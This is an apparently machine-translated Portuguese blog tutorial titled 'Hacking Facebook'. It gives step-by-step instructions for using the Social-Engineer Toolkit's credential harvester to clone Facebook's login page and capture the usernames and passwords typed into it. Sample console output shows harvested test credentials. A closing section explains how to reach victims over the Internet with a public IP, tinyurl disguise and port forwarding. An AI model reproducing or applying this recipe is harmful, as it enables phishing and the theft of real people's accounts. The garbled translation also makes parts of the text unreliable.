Hacking Facebook - Engenharia social Toolkit



Hacking Facebook

Engenharia social Toolkit

Os seres humanos são o elo mais fraco em qualquer sistema de segurança ~ Shashwat (Isso vai ser me)

O Toolkit social-Engineer (SET) foi criado e escrito pelo fundador da TrustedSec. É uma ferramenta orientada para o Python open-source que visa testes de penetração em torno social-Engenharia. SET tem sido apresentados em conferências de grande escala, incluindo Blackhat, DerbyCon, Defcon, e ShmooCon. Com mais de dois milhões de downloads, SET é o padrão para testes de penetração de engenharia social e apoiou fortemente dentro da comunidade de segurança.

Kali Linux

Eu não sinto a necessidade de mencioná-lo, mas eu ainda vou fazer isso. Você precisa Kali Linux para prosseguir com este tutorial.

Se-kit de ferramentas

Comece Kali Linux. Em um kit de ferramentas de console se-tipo / terminal.
Algo como isso vai aparecer
root @ kali: ~ # se-toolkit
[-] Novo arquivo set_config.py gerada em: 2014/05/26 08: 26: 33,526119
[-] Verificando a atualização de configuração ...
[*] Atualização verificada, configuração timestamp é: 2014/05/26 08: 26: 33,526119
[*] SET está usando a nova configuração, não há necessidade de reiniciar
_______________________________
/ _____ / \ _ _____ / \ __ ___ /
\ _____ \ | __) _ | |
/ \ | \ | |
/ _______ _______ // / | ____ |
\ / \ /
[-] O Toolkit social-Engineer (SET) [-]
[-] Criado por: David Kennedy (ReL1K) [-]
[-] Versão: 4.3.9 [-]
[-] Codename: 'Turbulence' [-]
[-] Siga-nos no Twitter:trustedsec [-]
[-] Siga-me no Twitter: @ dave_rel1k [-]
Bem-vindo ao Toolkit social-Engineer (SET). Único
balcão único para todas as suas necessidades de engenharia social.


Selecione a partir do menu:
1) Os ataques de engenharia social-
2) Fast-Track Teste de Invasão
3) Em terceiro lugar Módulos partido
4) Atualizar o Metasploit Framework
5) Atualizar o Toolkit social-Engineer
6) Atualizar configuração SET
7) Ajuda, Créditos e Sobre
99) Sair do Toolkit social-Engineer
set>
Agora digite o seguinte e pressione ENTER.
1 [entrar] 2 [entrar] 3 [entrar]

Explicação

  • 1 seleciona ataques de engenharia social. Escolha óbvia se você ler as outras opções 1-9 (e 99 para a saída)
  • O 2 seleciona site Vetores de Ataque. Não que óbvio. O módulo Ataque Web é uma maneira original de utilizar múltiplos ataques baseados na web, a fim de comprometer a vítima.
  • Em seguida, o 3 seleciona Credencial Harvestor. O método de credenciais Harvester irá utilizar a clonagem web de um web-site que tem um campo de nome de usuário e senha e colher todas as informações postadas no site.
Agora você vai estar vendo algo como this- O primeiro método permitirá SET para importar uma lista de pré-definido web
aplicações que pode utilizar no âmbito do ataque.
O segundo método irá clonar completamente um site de sua escolha
e permitir-lhe utilizar os vetores de ataque dentro do completamente
mesma aplicação web você estava tentando clonar.
O terceiro método permite importar seu próprio site, note que você
só deve ter um index.html ao usar o site de importação
funcionalidade.
1) Modelos Web
2) Cloner do Site
3) a importação personalizada
99) Regressar ao Menu WebAttack
Digite 2 para selecionar site de cloner.

Encontre o seu IP

Em um novo tipo de terminal ifconfig. Isto lhe dará o seu endereço IPv4, que é o que você está procurando

Voltar a se-toolkit

Agora ele vai pedir para você especificar o IP ao qual os dados é suposto ser enviada. Isso vai ser o seu endereço IP. Uma vez que este é o seu endereço IP interno (ou seja, IP local), a página de facebook falso irá funcionar apenas para computadores conectados com a rede local.
Agora ele vai pedir para a página a ser clonada. Digite https://www.facebook.com/.
set: WebAttack> 2
[-] Harvester Credencial lhe permitirá utilizar as capacidades de clone dentro SET
[-] Para colher credenciais ou parâmetros a partir de um site, bem como colocá-los em um relatório
[-] Essa opção é usada para o IP do servidor irá postar a.
definir: WebAttack> endereço IP para o cargo de volta em Harvester / Tabnabbing: 192.168.154.133
[-] SET suporta HTTP e HTTPS
[-] Exemplo: http://www.thisisafakesite.com
set: WebAttack> Digite o url para clonar: https://www.facebook.com/
Agora no seu browser em Kali Linux, digite o seu IP. Ele irá exibir página de login do Facebook. Digite qualquer informação e imprensa login. Você vai obter a informação em si-toolkit. Se você estiver usando VMWare ou VirtualBox, então você pode tentar e digite o IP sobre os navegadores lá. Vai funcionar.

Demonstração ao vivo

Para certificar-se que a manifestação não é apenas uma repetição do que você já sabe, eu decidi para clonar a página de login do Facebook, em vez de homepage. Será um pouco diferente. Aqui está uma imagem do que eu fiz.
O endereço IP é o meu endereço interno de ifconfig, que vem a ser 192.168.154.133. A página clonada é https://www.facebook.com/login.php. Agora vamos tentar ver se este Harvestor credencial funciona.

Na máquina Linux em si Kali

Entrando no IP no browser mostra a página de login falsa. Além disso, se-toolkit registra a visita e diz 192.168.154.133 - - [02 / novembro / 2015 02:32:32] "GET / HTTP / 1.1" 200 -
Agora, se digitar algo no campo, ele também aparece em se-toolkit. Entrei 'hackerkalilinux' no campo de nome de usuário e 'password' no campo de senha. Isto é o que se-toolkit shows-
Campo Nome de Usuário POSSÍVEL ENCONTRAR: email = hackerkalilinux
CAMPO POSSÍVEL ENCONTRAR SENHA: passe = senha
Observe também que se pode manter-toolkit despejar mais coisas no console, a maioria dos quais não é importante para o momento.

No Windows 8 máquina (host)

Agora eu estou correndo Kali em uma máquina virtual. Windows 8 é a máquina host, e nós pode querer verificar se ele funciona em Windows 8. Além disso, nós também gostaríamos de ver se navegadores modernos são capazes de observar nada de errado com a página, e se o firewall para o fluxo de dados.
Entrei windows8host e password2 e apertou o botão de login. Isto é o que eu tenho. Além disso, como eu estava logado no Facebook com a minha conta pessoal, a página falsa me redirecionado para facebook.
Campo Nome de Usuário POSSÍVEL ENCONTRAR: email = windows8host
Campo de senha POSSÍVEL ENCONTRAR: pass = password2
Conclusão: Este método funciona bem praticamente over LAN.

Fazê-lo funcionar através da Internet

Para fazer o trabalho técnica através da Internet, você vai precisar usar seu IP público em vez de privado. Pesquisa do Google para o que é o meu IP para encontrá-lo IP público. Em seguida, usá-lo. Você pode usar tinyurl ou algo para tornar o url pareçam legítimos. Além disso, o encaminhamento de porta pode precisar ser ativado, como o roteador pode bloquear o tráfego na porta 80. Firewall também pode causar problemas. Embora este tutorial foi nada mais do que - se-toolkit 1 2 3 [seu IP], 
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...